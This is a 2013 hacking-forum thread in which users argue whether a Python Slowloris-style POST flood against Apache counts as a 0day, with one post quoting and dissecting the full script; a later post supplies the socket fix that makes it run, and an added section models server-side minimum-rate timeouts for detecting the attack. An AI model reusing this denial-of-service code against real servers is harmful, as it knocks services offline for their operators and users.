[NEW] Apache 0day!!! only available on HTS [NEW]

For the discussion of Perl, Python, Ruby, and PHP and other interpreted languages.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Thu Aug 22, 2013 11:13 am

Yes I know what a 0day is, it means there has been 0 days and 0 hours since it has been patched or discovered.

If it is a '1,473' day why does it work perfectly on my fully updated Apache web server? :?:

funny. :mrgreen:
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Goatboy on Thu Aug 22, 2013 11:52 am

There is a difference between an exploit of a vulnerability, and tying up network resources.

The Slowloris software has been around since '09, and the attack has been known since well before that. It does not exploit a flaw in faulty code, it merely uses a clever method of leaving open connections. It affects more than just Apache, so it couldn't really be called an exploit, which usually has a fairly specific target.

If, however, you found a flaw in, say, the way Apache frees up old connections (improper memory management, pointer issues, etc) and crafted a special packet or came up with a method to exploit that, I'd call that 0day.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Sat Aug 24, 2013 2:18 pm

Slowloris affects Apache and a few other web servers, but does not affect all of them, such as IIS and NGINX. Therefore it is an exploit.

What I have done is made an exploit that does a Slowloris-type effect via POST requests, and keeping them alive.

This is a 0day, there has been 0 days and 0 hours since it has been discovered or patched.
Exploits are more than just buffer overflows and memory corruption, there are SQLi and XSS 0days that are just as devastating as this.

Maybe you are just jealous that I made a simple exploit you could have made yourself? :mrgreen:
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Goatboy on Sat Aug 24, 2013 4:09 pm

Let's go through this line by line and we'll see if there is a 0day here:


Code:
#!/usr/bin/python

#Apache Exploit developed by Th3_M4d_H4tt3r

#This exploit crashes (and consumes all connections to the server) within seconds.

Pretty standard stuff. Path to python executable, comment explaining program.


Code:
#Th3_M4d_H4tt3r
#Attack: Infinite
#Defence: Infinite
#Inteligence: N/A
#Age: 13
#Orgin: Wonderland

l337 h4x0R b4nn3r pr0pz & sh0utz


Code:
import socket
from time import sleep
import threading

More standard stuff


Code:
print "Welcome to Th3_M4d_H4tt3r's 0day Exploit for apache 2.X.X"

More script-kiddie bullshit


Code:
RHOST=raw_input("RHOST: ")
RPORT=int(raw_input("RPORT: "))

This must be the uber-tweak you mentioned to block teh skidzeez.


Code:
def PostExploit(HOST, PORT):

I guess naming your function "PostExploit" counts as this being an exploit. Somehow.


Code:
   while 1:
      try:
         s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         s.connect(HOST, PORT)
         s.send('''POST / HTTP/1.1
Host: '''+HOST+'''
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: '''+HOST+''':'''+PORT+'''
Connection: keep-alive
Content-Type: multipart/form-data
Content-Length: 65535

''')
         for i in xrange(0, 65535):
            sleep(1)
            s.send("A")
         s.send("\n\n")
      except:
         pass
count = 0

Basic HTTP POST and other misc. python code


Code:
while 1:
   try:
      Exploit = threading.Thread(target=PostExploit, args=(RHOST, RPORT,))
      Exploit.start()
      count = count+1
      print "Made "+str(count)+" connections."
      print "\033[2A"
   except:
      pass

Aha! A variable named Exploit! *Surely* this makes it a bona fide 0day!





In summary: There is nothing about your program that is unique, original, or cool. It is not a 0day. The guy who first discovered the attack and used it, however, did come up with something unique, original, and cool. You are simply applying the same technique. Here, let me demonstrate:

Code:
#include <stdio.h>

int main()
{
  printf("Fucknugget bitch-ass commodore 64 #yolo #dicktat #RonPaul");
}


There. It has been 0 days and 0 hours since someone has discovered this gem. Therefore, it is 0day. Yay.

^ Your logic.

-- Fin.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
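
Added example, not code from any post in this thread: the POST walked through above declares Content-Length: 65535 and then sends one byte per second, so a server-side minimum-rate body timeout ends it after about 20 seconds. The model below uses the rule Apache's mod_reqtimeout documents for `RequestReadTimeout body=20,MinRate=500` (start at 20 s, add 1 s per 500 bytes received); the function names, traces and addresses are constructed for illustration.

```python
# Added example: model of a minimum-rate body timeout (policy values are assumptions).
from collections import Counter

def drop_time(chunks, content_length, initial=20.0, min_rate=500, cap=None):
    """Return the second at which the body read times out, or None if the
    body completes. chunks: (seconds since headers ended, bytes) in time order.
    The allowance starts at `initial` seconds and grows by one second per
    `min_rate` bytes received, optionally capped at `cap` seconds."""
    received = 0

    def allowance():
        a = initial + received / min_rate
        return a if cap is None else min(a, cap)

    for t, nbytes in chunks:
        if t > allowance():          # server gave up before this chunk arrived
            return allowance()
        received += nbytes
        if received >= content_length:
            return None              # full body arrived in time
    return allowance()               # trace ended with the body incomplete

def flag_sources(connections, threshold=3):
    """Return source addresses with at least `threshold` timed-out bodies."""
    hits = Counter(src for src, length, chunks in connections
                   if drop_time(chunks, length) is not None)
    return sorted(src for src, n in hits.items() if n >= threshold)

# Constructed traces (not captured traffic). All declare Content-Length: 65535.
LENGTH = 65535
TRICKLE = [(t, 1) for t in range(1, 120)]            # 1 byte per second
FAST = [(0.5, 16384), (1.0, 16384), (1.5, 16384), (2.0, 16383)]
SLOW_LINK = [(t, 1000) for t in range(1, 67)]        # ~1 kB/s, legitimate

CONNECTIONS = (
    [("192.0.2.10", LENGTH, TRICKLE)] * 4            # one source, four stalls
    + [("198.51.100.7", LENGTH, FAST), ("203.0.113.5", LENGTH, SLOW_LINK)]
)

if __name__ == "__main__":
    for name, trace in (("trickle", TRICKLE), ("fast", FAST), ("slow link", SLOW_LINK)):
        print(name, drop_time(trace, LENGTH))
    print("flagged:", flag_sources(CONNECTIONS))
```

The slow but legitimate uploader at about 1 kB/s completes under the uncapped rule, while a hard cap (`cap=40`) would cut it off, which is the trade-off to weigh when choosing an upper bound.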


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by -Ninjex- on Sat Aug 24, 2013 5:51 pm

Sorry, hatter, but Goatboy is correct.
However, it is a good thing that you are bringing content to HTS, and I am thankful for that still.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
^(-.^)>


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Sat Aug 24, 2013 6:29 pm

His logic is correct; I do agree with him that what I made is not a 0day. Surely you all agree this is rather useful.

Also, the tweak I said was not int(raw_input("RPORT")).
RPORT must be int() hur dur, the tweak I made is s.connect(HOST, PORT) which should be s.connect((HOST, PORT))

Any Python coder who knows how to use sockets will know that. :geek:
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Goatboy on Sat Aug 24, 2013 6:47 pm

Th3_M4d_H4tt3r wrote: His logic is correct; I do agree with him that what I made is not a 0day. Surely you all agree this is rather useful.

So why'd you argue with me for so long?

Th3_M4d_H4tt3r wrote: Any Python coder who knows how to use sockets will know that. :geek:

I used Python once, about 4 years ago, for a small FTP migration project. Forgive me if my knowledge isn't up to par.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by anonHacker on Sat Aug 24, 2013 7:34 pm

Th3_M4d_H4tt3r wrote: Yes I know what a 0day is, it means there has been 0 days and 0 hours since it has been patched or discovered.

If it is a '1,473' day why does it work perfectly on my fully updated Apache web server? :?:

funny. :mrgreen:

Evidently you don't know what 0day is. 0 day refers to "days of public disclosure." When it is publicly disclosed, that is day 1. This has already been known for a while. Whether or not it has been patched is a different issue. Also, if you post 0day to HTS, it is no longer 0day because HTS is publicly accessible (Google crawls it, for one).

Also, 1337sp34k is pretty much a script kiddie thing these days. (These days being defined as the past 15 or more years.)
Last edited by anonHacker on Sun Aug 25, 2013 1:12 am, edited 1 time in total.


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by tgoe on Sat Aug 24, 2013 10:21 pm

Brought a tear to my eye. Who is this "Goatboy" character anyway?


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Sun Aug 25, 2013 1:11 pm

anonHacker wrote:
Th3_M4d_H4tt3r wrote: Yes I know what a 0day is, it means there has been 0 days and 0 hours since it has been patched or discovered.

If it is a '1,473' day why does it work perfectly on my fully updated Apache web server? :?:

funny. :mrgreen:

Evidently you don't know what 0day is. 0 day refers to "days of public disclosure." When it is publicly disclosed, that is day 1. This has already been known for a while. Whether or not it has been patched is a different issue. Also, if you post 0day to HTS, it is no longer 0day because HTS is publicly accessible (Google crawls it, for one).

Also, 1337sp34k is pretty much a script kiddie thing these days. (These days being defined as the past 15 or more years.)

I only use 1337sp34k in my usernames, as most of them are already taken.
Alright, I am in rage mode.

:evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil:
I THINK WE CAN ALL FUCKING AGREE THIS IS NO LONGER A 0DAYYHH!!!
:evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil:

I am done, lel convo ovher.
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv

